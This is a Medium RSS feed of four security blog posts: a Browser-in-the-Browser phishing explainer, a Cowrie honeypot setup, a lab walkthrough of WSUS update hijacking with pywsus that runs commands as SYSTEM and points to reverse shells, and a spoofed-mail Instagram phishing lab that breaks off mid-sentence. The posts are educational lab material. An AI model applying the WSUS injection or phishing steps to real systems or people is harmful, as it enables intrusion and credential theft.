<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Stories by Janberk Beşgül on Medium]]></title>
        <description><![CDATA[Stories by Janberk Beşgül on Medium]]></description>
        <link>https://medium.com/@janberkb?source=rss-618cc39dba94------2</link>
        <image>
            <url>https://cdn-images-1.medium.com/fit/c/150/150/1*k4AgqRt5bXKneqg1gOLRkQ.png</url>
            <title>Stories by Janberk Beşgül on Medium</title>
            <link>https://medium.com/@janberkb?source=rss-618cc39dba94------2</link>
        </image>
        <generator>Medium</generator>
        <lastBuildDate>Sat, 25 Jul 2026 17:00:53 GMT</lastBuildDate>
        <atom:link href="https://medium.com/@janberkb/feed" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[Browser-in-the-Browser (BitB): Faceit Üzerinden Yapılan Sofistike Oltalama Saldırısı]]></title>
            <link>https://janberkb.medium.com/browser-in-the-browser-bitb-faceit-%C3%BCzerinden-yap%C4%B1lan-sofistike-oltalama-sald%C4%B1r%C4%B1s%C4%B1-3e0fc921c8d9?source=rss-618cc39dba94------2</link>
            <guid isPermaLink="false">https://medium.com/p/3e0fc921c8d9</guid>
            <category><![CDATA[browser-in-the-browser]]></category>
            <category><![CDATA[social-engineering]]></category>
            <dc:creator><![CDATA[Janberk Beşgül]]></dc:creator>
            <pubDate>Tue, 21 Apr 2026 08:05:36 GMT</pubDate>
            <atom:updated>2026-04-21T08:51:54.533Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ovDuOO9wikeWotp8Y4UGrw.png" /></figure><p>Geçtiğimiz günlerde oyun oynarken yaşadığımız fakat bu yöntemi teknik olarak bildiğimiz için düşmediğimiz gayet güzel kurgulanmış bir oltalama saldırı örneğini sizlere göstereceğim. Son dönemde siber saldırganların hedefinde özellikle rekabetçi oyuncu toplulukları yer alıyor(Oyun içindeki pazar ile gerçek para kazanılabildiği için). CS2 (Counter-Strike 2) ekosisteminde popüler olan Faceit platformunu taklit eden yeni nesil bir oltalama (phishing) yöntemi, en dikkatli kullanıcıları bile hataya düşürebilecek kadar profesyonelce kurgulanmış.</p><p>Bugün, sıkça rastlanan ancak tespiti zor olan Browser-in-the-Browser (BitB) tekniğini bir vaka üzerinden inceleyeceğiz.</p><h3>🔍 Saldırı Senaryosu: Güven Nasıl İnşa Ediliyor?</h3><p>Süreç genellikle bir Discord sunucusu üzerinden başlıyor. Saldırganlar, bir “Faceit Status” veya “Tournament Bot” kullanarak kurbanın güvenini kazanıyor. Kurbandan, turnuvaya katılabilmesi veya hesabını doğrulaması için bir linke tıklaması isteniyor.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*IpQDR18O7X6stPpc" /></figure><p>Burada kurgulanan sosyal mühendislik aşamaları şöyledir:</p><ol><li>Bot Etkileşimi: Kurbanın kullanıcı adı ve seviyesi gibi genel bilgileri istenerek “resmi” bir süreç izlenimi veriliyor.</li><li>Sahte Landing Page: Linke tıklandığında, Faceit’in tasarım dilini (fontlar, renkler, Anti-Cheat logoları) birebir kopyalayan profesyonel bir web sitesi kurbanı karşılıyor.</li><li>Kritik Adım — OAuth Tuzağı: “Steam ile Doğrula” butonuna basıldığında karşımıza o meşhur Steam giriş penceresi çıkıyor.</li></ol><h3>❓ Browser-in-the-Browser (BitB) Nedir?</h3><p>Geleneksel oltalama yöntemlerinde saldırganlar faceit-verify.com gibi sahte bir alan adı kullanır. Ancak BitB saldırısında, tarayıcı içinde tarayıcı simüle edilir.</p><p>Açılan Steam giriş penceresi aslında işletim sistemine ait bağımsız bir pencere değildir. Web sayfasının içine HTML ve CSS kullanılarak çizilmiş, adres çubuğundan kilit simgesine kadar her detayıyla sahte bir “görsel illüzyondur”. Kurban adres çubuğuna baktığında <a href="https://steamcommunity.com">https://steamcommunity.com</a> adresini ve geçerli SSL sertifikasını görür, ancak bu sadece bir resimden ibarettir.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*M5KjJSzk0IWgpkXN" /></figure><h3>Bu Saldırı Nasıl Tespit Edilir?</h3><p>Görselde de net bir şekilde görüldüğü üzere, bu karmaşık saldırıyı tespit etmenin çok basit bir yolu vardır: Açılan küçük tarayıcıyı gerçek tarayıcınızın dışına sürükleyin.</p><ul><li>Sınırları Zorlayın: Eğer karşınıza çıkan Steam giriş penceresini, ana tarayıcı sekmenizin dışına (örneğin masaüstüne doğru) sürükleyemiyorsanız; o pencere ana tarayıcının sınırlarında hapsoluyor veya kesiliyorsa, bu bir BitB saldırısıdır. Gerçek bir pop-up penceresi tarayıcıdan bağımsız hareket eder.</li><li>Karanlık Mod Testi: Tarayıcınız karanlık moddayken, oltalama sayfası aydınlık modda bir pencere simüle ediyorsa bu bir uyarı işaretidir.</li><li>Parola Yöneticileri: Bitwarden veya Chrome’un kendi şifre yöneticisi gibi araçlar, bu sahte pencereleri tanımaz ve otomatik doldurma yapmaz. Eğer şifreniz otomatik gelmiyorsa durup düşünün.</li></ul><h3>Sonuç ve Korunma</h3><p>Siber saldırganlar artık sadece teknik açıkları değil, görsel algılarımızı da manipüle ediyor. CS2 topluluğu ve Faceit kullanıcıları başta olmak üzere, tüm internet kullanıcılarının “güvenli bağlantı” simgesine (kilit simgesi) körü körüne güvenmemesi gerekiyor.</p><p>Siz de hiç bu tür bir saldırıyla karşılaştınız mı?</p><p>Credit: Cihan Aytunç Biçer’e bu saldırıyı keşfetmemizdeki katkılarından dolayı teşekkür ederim.</p><p>Reference: <a href="https://mrd0x.com/browser-in-the-browser-phishing-attack/">https://mrd0x.com/browser-in-the-browser-phishing-attack/</a></p><p>#CyberSecurity #Phishing #BitB #Infosec #SocialEngineering #CS2 #Faceit #RedTeaming #SiberGüvenlik</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=3e0fc921c8d9" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Integrating Honeypot to Your Network| Part 1: How to Install Cowrie by Janberk Besgul]]></title>
            <link>https://janberkb.medium.com/integrating-honeypot-to-your-network-part-1-how-to-install-cowrie-by-janberk-besgul-8ab0c99e821f?source=rss-618cc39dba94------2</link>
            <guid isPermaLink="false">https://medium.com/p/8ab0c99e821f</guid>
            <category><![CDATA[security]]></category>
            <category><![CDATA[cowrie]]></category>
            <category><![CDATA[information-security]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[honeypot]]></category>
            <dc:creator><![CDATA[Janberk Beşgül]]></dc:creator>
            <pubDate>Sun, 01 Jun 2025 11:05:26 GMT</pubDate>
            <atom:updated>2025-06-01T11:50:14.069Z</atom:updated>
            <content:encoded><![CDATA[<h3>Integrating Honeypot to Your Network | Part 1: How to Install Cowrie by Janberk Besgul</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*AcX2m2qRqpuiVHvuR2T5yA.jpeg" /><figcaption><a href="https://www.freepik.com/free-vector/honey-icons-set_3925345.htm#page=2&amp;query=honey&amp;position=6&amp;from_view=search&amp;track=sph">Image by macrovector</a> on Freepik</figcaption></figure><p><strong>In this part of the topic, you will be guided on;</strong></p><ol><li>What is Honeypot?</li><li>Why do networks need it?</li><li>What type of Honeypot is right for the network?</li><li>Where should the Honeypot be located and how to isolate the Honeypot from the real network?</li><li>How to install and configure the Cowrie Software?</li></ol><p><strong>In Part 2, you will be learned:</strong></p><ol><li>How to install and integrate SIEM on your network?</li><li>How to analyze the Honeypot logs and create alarms for threats?</li></ol><p><strong>In Part 3, you will be learned:</strong></p><ol><li>How to install SOAR and integrate it with SIEM?</li><li>How to create playbooks to block the threat IoCs?</li><li>How to automate the blocking process with SOAR and a Firewall?</li></ol><h3><strong>Summary of Purpose</strong></h3><p>This blog post aims to be a guide for you to understand what the Honeypot is, how to choose the best one to protect your network and understand your needs, implement a Honeypot in your network and configure it for your system to look realistic. Nowadays, Honeypots are complex and advanced systems. They provide useful pre-attack alerts and information on hacker methods.</p><h3>1. What is Honeypot?</h3><p>There is a lot of information and blog posts about what a honeypot is obviously. I don’t want to make this part long but I want to explain this subject in my own way shortly.</p><p>Imagine that you are planning to rob a museum, looking for a hidden security flaw to steal some valuable pieces. You are walking in the museum and inspecting the security systems silently. You are thinking of creating a strategy to go in, take the valuable piece and go out. Suddenly, you notice that there is a chance to disable all alarms with the default system password because you caught a moment for shoulder surfing. Everything is going perfectly for you, you are disabling it, you are not in a hurry, you are trying to unlock the lock. At that moment, cops are coming and the end of the story. You are going to jail and are charged with your acts.</p><p>The security system with a default password was fake. The default password is just to enable the alarm system, not to disable it. There is a secret password to disable it. If you are trying to disable it with the default password, it sends an alert to the security crew that something is going wrong. Yes, you got it, that was a <strong>Honeypot</strong>. A fake security vulnerability is prepared for intruders. A security system that secretly informs the security team while the attacker spends time with a fake vulnerability.</p><p>Of course, Honeypot<strong> </strong>is more than that but I think that example could make you imagine what the logical strategy behind this system is.</p><h3>2. Why do networks need it?</h3><p>There are different types of Honeypot Software. You can simulate many vulnerable services, such as SSH, FTP, vulnerable Apache servers, and many more. Some Honeypot systems can create IoCs and Signatures of malware activity.</p><p>The thing is, when your systems are hacked, your fake vulnerable systems will be damaged and you will be informed of that attack before the attacker starts attacking the real servers.</p><p>There is another advantage. You should be aware of the hacker&#39;s scanning and enumeration methods. You can analyse what types of attacks they are trying, what passwords they are using during brute force attacks, which IPs are used by attackers and which IPs you need to block on your systems.</p><p>Your system needs a pawn to sacrifice to stay secure and <strong>Honeypot</strong> is the right choice for that.</p><p>Now you know why you need a Honeypot. Let’s look at which Honeypot is suitable for your systems and how to analyse your needs.</p><h3>3. What type of Honeypot is right for the network?</h3><p>First of all, you need to think of your network structure. Remember, it needs to be realistic, you can not set an RDP Honeypot on the defense industry’s DMZ network because that is an amateur mistake to make for the defense industry’s network crew.</p><p>There is a GitHub repo that contains many types of Honeypot software below:</p><p><a href="https://github.com/paralax/awesome-honeypots">GitHub - paralax/awesome-honeypots: an awesome list of honeypot resources</a></p><p>You can check various types of Honeypots from here and choose one or a few of them. Just make sure they don&#39;t affect each other. We are going to use this Honeypot below:</p><p><a href="https://github.com/cowrie/cowrie">GitHub - cowrie/cowrie: Cowrie SSH/Telnet Honeypot https://docs.cowrie.org/</a></p><p>We will choose Cowrie software because;</p><ul><li>It combines multiple service types in one Honeypot.</li><li>It can send logs of the attacker’s activity to Splunk. This feature enables this Honeypot to be monitored easily.</li></ul><p>It is important that we can send logs to Splunk for us because I have Splunk in my network and I want to monitor the attacker’s activity from there. Having multiple service types on this software is an advantage, maybe I want to change the vulnerable service one day or maybe I want to set up a few Honeypots that run different services and manage them from one centre.</p><p>At the end of it, we have chosen our Honeypot that has these features above. It is time to set up your Honeypot but to where? How can we set up a vulnerable machine without affecting our network during an attack? How to keep our network secure by isolating the Honeypot from the real network?</p><h3>4. Where should the Honeypot be located and how to isolate the Honeypot from the real network?</h3><p>When you are setting up a Honeypot in your network, you don’t want it to be vulnerable. It must be fake, limited and isolated from your real network. Otherwise, it won’t be a security system 😀. All we want is to trick the outside and inside threat actors. It could be possible that we can detect the infected machine that is trying to do lateral movement. In this way, we also catch a malware that infects our network.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/863/1*NePqxQIf-xrxg_gKYm9Bgw.png" /><figcaption>Figure 1. Network diagram with honeypots.</figcaption></figure><p>As you can see in Figure 1, we have deployed two Honeypots. The important subject here is why. Why do we have two Honeypots and why is one of them inside the network? The outside one is for distracting intruders and alerting the SOC Team if an attack is happening from outside. The inside one is for detecting an insider threat movement. There could be a hacker or malware inside that is not trapped by an outside one. This hacker could be trapped by an inside one. More traps mean more mice are caught, right?</p><p>We need these hackers to reach Honeypots but these Honeypots should not be reaching the real network. If they can, maybe hackers could do too.</p><p>Here is what you can do to locate your Honeypot systems.</p><ul><li>Honeypots should be isolated from real networks.</li><li>You can locate your Honeypots behind firewalls.</li><li>Firewall rules should be configured to allow the packets to go to Honeypots but block the packets coming from the Honeypot to the real network.</li><li>If you are using Honeypots to send logs to your SIEM product, such as Splunk, you need to allow the Honeypots to send logs to the SIEM on a specific port. This means you should use the whitelisting method for these operations.</li></ul><p>Now, we know how to locate our Honeypots in our network. It is time to see how to install the Cowrie.</p><h3>5. How to install and configure the Cowrie Software</h3><p>Now, we have two different installation options:</p><ol><li>Install with Docker</li><li>Install with local files on the host directly</li></ol><p>I will be using the first Docker option because it is easy to deploy. You don’t have to struggle with dependencies. Just edit the config file and deploy Cowrie.</p><p>Note: After setting up the operating system, it is essential to install an SSH server on a different port. <a href="https://askubuntu.com/a/1442770">Source</a>.</p><p>So, let’s start by installing Docker on Ubuntu Server following this <a href="https://www.digitalocean.com/community/tutorials/how-to-install-and-use-docker-on-ubuntu-22-04">source</a>.</p><ol><li>After installing Docker, we can create the etc directory in the home directory for creating Cowrie config files to customize our installation.</li></ol><pre>janberkb@honeypot:~$ mkdir /home/janberkb/etc<br>janberkb@honeypot:~$ cd /home/janberkb/etc</pre><p>2. Download the config and userdb files from GitHub and change the names to activate the configs that you made.</p><pre>janberkb@honeypot:~/etc$ wget https://github.com/cowrie/cowrie/blob/main/etc/cowrie.cfg.dist<br>janberkb@honeypot:~/etc$ wget https://github.com/cowrie/cowrie/blob/main/etc/userdb.example<br>janberkb@honeypot:~/etc$ cp ./cowrie.cfg.dist ./cowrie.cfg<br>janberkb@honeypot:~/etc$ mv ./userdb.example ./userdb.txt</pre><p>3. Edit the userdb.txt and set a user to use it while logging in via SSH. I did this, for example.</p><pre># Example userdb.txt<br># This file may be copied to etc/userdb.txt.<br># If etc/userdb.txt is not present, built-in defaults will be used.<br>#<br># &#39;:&#39; separated fields, file is processed line for line<br># processing will stop on first match<br>#<br># Field #1 contains the username<br># Field #2 is currently unused<br># Field #3 contains the password<br># &#39;*&#39; for any username or password<br># &#39;!&#39; at the start of a password will not grant this password access<br># &#39;/&#39; can be used to write a regular expression<br>#<br>root:x:123456</pre><p>Now I can connect to the honeypot using this credential. “root” for username, “123456&quot; for password.</p><p>4. Edit the “cowrie.cfg” file to change the port on which Honeypot’s SSH service will run and some customizing processes. Change the fields that are shown below.</p><pre># for customizing the honeypot and improving the realism.<br># Edit it under Honeypot section.<br>hostname = SP008BYS01<br># SSH Version as printed by &quot;ssh -V&quot; in shell emulation<br># Edit it under SHELL section.<br>ssh_version = OpenSSH_7.9p1, OpenSSL 1.1.1a  20 Nov 2023<br># Set the SSH port for honeypot.<br># Edit it under SSH section of file.<br>listen_endpoints = tcp:22:interface=0.0.0.0</pre><p>5. Run the Docker command to run the honeypot on port 22.</p><pre>janberkb@honeypot:~/etc$ cd<br>janberkb@honeypot:~$ sudo docker run -p 22:22 - mount type=bind,source=./etc,target=/cowrie/cowrie-git/etc cowrie/cowrie</pre><p>Let’s try to connect it via SSH with the credentials that we set.</p><p>I am checking the IP of my Honeypot server.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/713/1*uOFqnK12sm5_q3uwbwVf4w.png" /></figure><p>Connecting the server via SSH.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/743/1*6Pt-lsNsmiLR_UwhGs9oDw.png" /></figure><h3>6. Conclusion</h3><p>We have installed SSH Honeypot running on port 22 on our Honeypot server. When we export the Virtual Machine and import the Honeypot on our Network VLANs, we can trap the attackers and detect the suspected movements.</p><p><strong>In Part 2, We‘ll be doing:</strong></p><ol><li>Install Splunk SIEM on our network.</li><li>Configure the Cowrie to send logs to Splunk SIEM.</li><li>Parse the logs sent by Cowrie and set up alerts for any attack activity directed towards the honeypot.</li></ol><h4>Please contact me if you have any feedback on this blog post.</h4><h4>Please check the Linktree page for details of how to contact me.</h4><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=8ab0c99e821f" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Pywsus ile WSUS Güncellemesine Zararlı Yazılım Enjeksiyonu]]></title>
            <link>https://janberkb.medium.com/pywsus-ile-wsus-g%C3%BCncellemesine-zararl%C4%B1-yaz%C4%B1l%C4%B1m-enjeksiyonu-2b28b19eb78e?source=rss-618cc39dba94------2</link>
            <guid isPermaLink="false">https://medium.com/p/2b28b19eb78e</guid>
            <category><![CDATA[hacking]]></category>
            <category><![CDATA[pentesting]]></category>
            <category><![CDATA[tools]]></category>
            <category><![CDATA[hack-tool]]></category>
            <category><![CDATA[wsusupdate]]></category>
            <dc:creator><![CDATA[Janberk Beşgül]]></dc:creator>
            <pubDate>Wed, 23 Aug 2023 14:21:43 GMT</pubDate>
            <atom:updated>2023-10-18T20:04:20.528Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Nq-d0_bTjy3b67YNUq3efQ.jpeg" /><figcaption><a href="https://www.freepik.com/free-vector/update-concept-illustration_12832992.htm#query=update&amp;position=3&amp;from_view=search&amp;track=sph">Source</a></figcaption></figure><p>Bu yazıda inceleyeceğimiz araç WSUS Server’dan güncelleme çeken bir bilgisayara gerekli güncelleme yerine sahte bir güncelleme dosyası göndermemizi ve istediğimiz komutu yetkili kullanıcı olarak çalıştırmamızı sağlar.</p><p>Çok kullanıcılı şirketler internet trafiği sıkıntısı çekmemek adına güncellemeleri Microsoft Sunucularından kendi güncelleme sunucularına çekerek tek bir indirme ile iç ağda belki de binlerce cihaza güncellemeyi sağlayabilir.</p><p>10.000 tane bilgisayarın Windows güncellemelerini Microsoft sunucularından ayrı ayrı indirdiğini bir hayal edin.</p><ul><li>WSUS Server: Windows Server üzerinde Windows Update Center’dan gerekli updateleri kendi üstüne indirerek yapıdaki diğer cihazlara bu updateleri iletmekle görevli yapıdır.</li><li>Pywsus: Kendine gelen güncelleme isteğine sahte güncelleme yöntemi ile cevap vererek istediğimiz bir komutu NT AUTHORITY\SYSTEM hakları ile çalıştırmamızı sağlar.</li></ul><p>Deneme yapmak için gereken Lab ortam bilgileri aşağıda belirtilmiştir:</p><ul><li>Saldırgan Sistem: Kali Linux 2021.2</li><li>Hedef Sistem: Windows 10 1909</li><li>Bettercap: Kali Terminalde “sudo apt install bettercap” komutu ile yükleyebilirsiniz.</li><li>Pywsus Kali Terminalde “git clone <a href="https://github.com/GoSecure/pywsus.git%E2%80%9D">https://github.com/GoSecure/pywsus.git&quot;</a> komutu ile github’dan programı indirebilir veya github linkinden zip dosyası olarak indirip kullanabilirsiniz. Sonrasında yine link üzerindeki installation kısmının altındaki gereksinimleri uygulayarak uygulamamızı hazır hale getiriyoruz.</li></ul><p><strong>Gerçekleştirilecek saldırı senaryosu:</strong></p><p>Bu saldırı senaryosunda ağ üzerinden erişilebilen Windows 10 makinenin WSUS Server’dan güncelleme yükleme isteği sırasında trafiği kendi makinemize yönlendirerek ve sahte bir güncellemeyi araya sokarak hedef sistemimize yetkili kullanıcı olarak erişmeye çalışacağız, bunun için öncelikle ortadaki adam olup trafiğe müdahale edebilmemiz gerekiyor.</p><p><strong>Uygulama:</strong></p><p>Öncelikle saldırıda kullanacağımız Bettercap aracını Kali Linux’e yüklüyoruz.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/698/0*nFqi9OI2e4Gf8wqn.png" /></figure><p>Yükleme gerçekleştikten sonra gerekli olan diğer aracımızı yani Pywsus aracını yüklüyoruz. Bunun için öncelikle masaüstüne geliyoruz ki dosyamızı masaüstüne indirelim.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/698/0*qsVmRWR46sEnzide.png" /></figure><p>Sonra git clone komutu ile aracımızı github’dan indiriyoruz.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/698/0*MHy5gmUo_zcfSmlW.png" /></figure><p>Klasör indikten sonra klasörün içine gidiyorum komut satırında ve sırası ile aşağıdaki komutları çalıştırıyorum.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/442/0*QogJhpi9w6C5eGuE.png" /></figure><p>Öncelikle işlemlere başlamadan önce Windows cihazımızı network üzerinde gördüğümüzden ve erişimimiz olduğundan emin oluyoruz ama zaten bizim senaryomuzda biz ağa sızdık ve Windows cihaza erişiyoruz ve WSUS serveri tespit edilmiş durumda, bu işlemler farklı bir yazının konusu olduğu için buraya girmiyoruz ve bu senaryodan devam ediyoruz, amacımız karşı makinede admin yetkisi ile komut çalıştırmak.</p><p>Öncelikle Bettercap ile bağlantı yapmak için hazırlıklarımızı yapıyoruz ve aşağıdaki bilgileri bir metin editöründe satır satır yazıp WSUS.cap olarak kaydediyoruz.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/310/0*HGg8h_6kbwpPwg9m.png" /></figure><p>Gerekli ayarlamalarımızı yaptıktan sonra artık bettercap aracımızı çalıştırıp hedef ip mizden çıkan 8530 portunu kullanan bütün istekleri kendimize yönlendirelim.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/698/0*rMvJikxTbcUP5Omt.png" /></figure><ul><li>-iface parametresi ile bizim hedef makineye eriştiğimiz interfaceyi seçiyoruz, eğer bilmiyorsak bunu “ifconfig” komutu ile internet bilgilerimizi listeleyerek görebiliriz.</li><li>-caplet parametresi ile gerekli ayarları ve komutları çekeceğimiz dosyayı belirliyoruz ki bu dosya bizim az önce hazırladığımız dosya.</li></ul><p>Daha sonra indirip hazırlığını yaptığımız programı çalıştırıyoruz ve gelecek güncelleme isteklerini dinlemesi için bekletiyoruz.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/698/0*305OEzbwTLK8LIm2.png" /></figure><p>python3 pywsus.py -H 10.0.2.6 -p 8530 -e PsExec64.exe -c &#39;/accepteula /s cmd.exe /c &quot;whoami &gt; C:\\poc.txt&quot; &#39;</p><p>Eğer hedefimiz biz bu şekilde dinlerken update yapmaya çalışırsa komut olarak yazdığımız cmd.exe’de çalıştırılacak whoami komutu C disk’in içerisinde poc.txt adında bir dosyaya yazdırılacak.</p><p>Güncelleme isteği geldiği zaman programımız güncelleme cevabı dönerek aksiyon aldı ve istediğimiz fonksiyonu yerine getirdi. Şimdi hedef makinemizi kontrol edelim bakalım neler olmuş.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/698/0*eCZ9ptw2HW0ESQnf.png" /></figure><p>Komutu hangi kullanıcı hakları ile çalıştırdığımızı da poc.txt içinden görebiliyoruz.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/548/0*iOdreq6mcdQqQcUB.png" /></figure><p>Dolayısıyla buradan şunu anlıyoruz ki biz cmd.exe yi çalıştırıp whoami komutunu girip çalıştırdığımızda biz bu komutu nt authority\system olarak çalıştırıyoruz ki bu kullanıcı admin yetkilerine sahip bir kullanıcıdır. (aslinda “nt authority\system” ne bir kullanici, ne de bir gruptur. Security ID ismidir, servis hesaplarinin yetkilendirilmesi icin kullanilir, SID i baska kullanicilara veya servis hesaplarina eklenebilir ornegin. Gorev yoneticisinde “SYSTEM” olarak gorunur).</p><p>Yapabileceğimiz bir diğer şey ise tabii sisteme erişmeye çalışmak olacaktır ki bunu da komutta küçük bir değişiklik yaparak cmd.exe üzerinden powershell.exe’yi çalıştırmasını söyleriz, ardından whoami komutu çalıştırdığımız kısımda da <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell">buradan</a> bulabileceğimiz powershell reverse shell komutlarını kendi IP adresimize göre düzenleyip çalıştırarak ve ardından belirlediğimiz portu netcat ile dinleyerek sisteme erişim sağlayabiliriz, sonrasında yapacaklarınız hayal gücünüze kalmış.</p><p><em>Originally published at </em><a href="https://github.com/Janberkb/Malware-Injection-with-Pywsus"><em>http://github.com</em></a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=2b28b19eb78e" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Phishing Attack with Spoofed Mail from Scratch]]></title>
            <link>https://janberkb.medium.com/phishing-attack-with-spoofed-mail-from-scratch-d937962168c?source=rss-618cc39dba94------2</link>
            <guid isPermaLink="false">https://medium.com/p/d937962168c</guid>
            <category><![CDATA[hacking]]></category>
            <category><![CDATA[gophish]]></category>
            <category><![CDATA[fakemail]]></category>
            <category><![CDATA[spoofing]]></category>
            <category><![CDATA[phising]]></category>
            <dc:creator><![CDATA[Janberk Beşgül]]></dc:creator>
            <pubDate>Wed, 23 Aug 2023 14:01:13 GMT</pubDate>
            <atom:updated>2023-10-18T19:56:46.550Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*qCpAzYMtinfAsH5TXgqYVw.jpeg" /><figcaption><a href="https://www.freepik.com/free-vector/phishing-account_8088576.htm#query=phishing&amp;from_query=phsihing&amp;position=14&amp;from_view=search&amp;track=sph">Source</a></figcaption></figure><h3>Content</h3><ul><li>Introduction</li><li>Lab Installation Guide</li><li>Simulation Workflow</li><li>Conclusion</li></ul><h3>Introduction</h3><p>I decided to set up a local virtual lab to try phishing techniques and create a scenario about it. So I started to research email scams because phishing over websites and credential harvesting has one goal; take the credential, send it back to me and save this information to the file. I found some tools for sending mail using SMTP. Let’s set up the local lab.</p><h3>Lab Installation Guide</h3><h4>Requirements</h4><ul><li>Kali Linux,</li><li>Windows 10 device for receiving mail and hMailServer installed as SMTP Server,</li><li>PHP installed on your Kali,</li><li>Gophish installed on your Kali,</li></ul><h3>Installation</h3><ol><li>Kali Linux Bare Metal Installation: <a href="https://www.kali.org/docs/installation/hard-disk-install/">https://www.kali.org/docs/installation/hard-disk-install/</a></li><li>Kali Linux Guest VM Installation: <a href="https://www.kali.org/docs/virtualization/install-virtualbox-guest-vm/">https://www.kali.org/docs/virtualization/install-virtualbox-guest-vm/</a></li><li>Windows 10 Installation: <a href="https://www.groovypost.com/howto/windows-10-install-virtualbox/">https://www.groovypost.com/howto/windows-10-install-virtualbox/</a></li><li>Install “hMailServer”: <a href="https://medium.com/@coffmans/setup-your-own-simple-smtp-server-how-to-c9159cfc7934">https://medium.com/@coffmans/setup-your-own-simple-smtp-server-how-to-c9159cfc7934</a></li></ol><p>Actually, in a real scenario, we just need an SMTP Server for sending mail but we are going to see how the mail comes. So we need to set up an entire mail system including IMAP.</p><p>When we set the “hMailServer” we can open the mailbox using Outlook or the Mail app Microsoft:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*ctit5Z0nq_CbONAx.png" /></figure><p>Create a domain and account like the installation document shows you and when open Outlook, just type the account that you created.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/477/0*z-eCRzUuT3VQCLOH.png" /></figure><p>After that, you need to choose IMAP from here.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/477/0*MxhVnrVN9oQ4OmEU.png" /></figure><p>Fill these server fields with the IP of your Windows machine because hMailServer is installed and working on this machine. It needs to go there and send and receive mail from that server.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/471/0*YK3fIJGOt6pGAwZH.png" /></figure><p>Type the password of the user and voilà :) You have a mailbox. Now you can send and receive mail locally.</p><p>Now we need to send spoofed mail so we need a tool called Gophish, I gave the installation link above when you install Gophish on your Kali Linux everything will be perfect and we are going to be ready to go.</p><p>💡 Troubleshooting Tips: If your Outlook doesn’t connect to your mailbox you need to permit these ports from Windows Firewall Advanced Settings Inbound Rules (25, 110, 143)</p><p>Download the latest Gophish release and extract it from the archive.</p><p>Go to the folder that you have extracted on the command line and set permission to the executable file.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*uihCcLjqHWYfgKCa.png" /></figure><p>Now you can run the executable file.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*SR9-WkA31v7YHrLe.png" /></figure><p>It opens a user interface on 127.0.0.1:3333 and a phishing server at 0.0.0.0:80 and it gives us the one-time admin password for the admin interface.</p><p>Login with that one-time password to the admin account and set a new password.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*2ryjNNGoRPntHyAw.png" /></figure><p>Because we will use our phishing website, we need to change the port of gophish landing page from 80 to 8080</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/963/0*hujdE_gFEbSenzv7.png" /></figure><p>Open the config.json file with the text editor.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/976/0*XFr_wVu1qKLhjnix.png" /></figure><p>Change the listen_url value under phish_server from 0.0.0.0:80 to 0.0.0.0:8080</p><p>We are doing this because we need to share our phishing website from port 80 and there should be no service on port 80.</p><h3>Simulation Workflow</h3><p>This is the most important part, we are going to see the workflow of our scenario. Let’s quickly check;</p><p>We have a Windows 10 machine which is the victim’s computer but remember this is a simulation and we need an SMTP Server We are using this victim’s machine as a Mail Server and we installed “hMailServer” on this machine.</p><p>We have a Kali Linux machine for hacking of course :) We installed php on this because it will publish our phishing website for other users and catch the POST request. We have gophish installed on Kali too and gophish is a tool to create mail phishing simulations as you can guess.</p><p>Now I am ready to create my mail template as HTML.</p><p>We are going to attack Instagram and we need a mail like “New login to your account, if it is not you, you can secure your account from this link”. So I am using the mail from my mailbox :)</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/589/0*kz4DgXQI2XM-eNeI.png" /></figure><p>It is Turkish mail but it is saying “You have a login from the device new, You can ignore this mail if it was you, if you don’t do that you can secure your account from here.” and something like that.</p><p>Open your developer tool and choose the mail content.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*xINiH5bTrG6Ivs5P.png" /></figure><p>Right-click on this element and copy it as 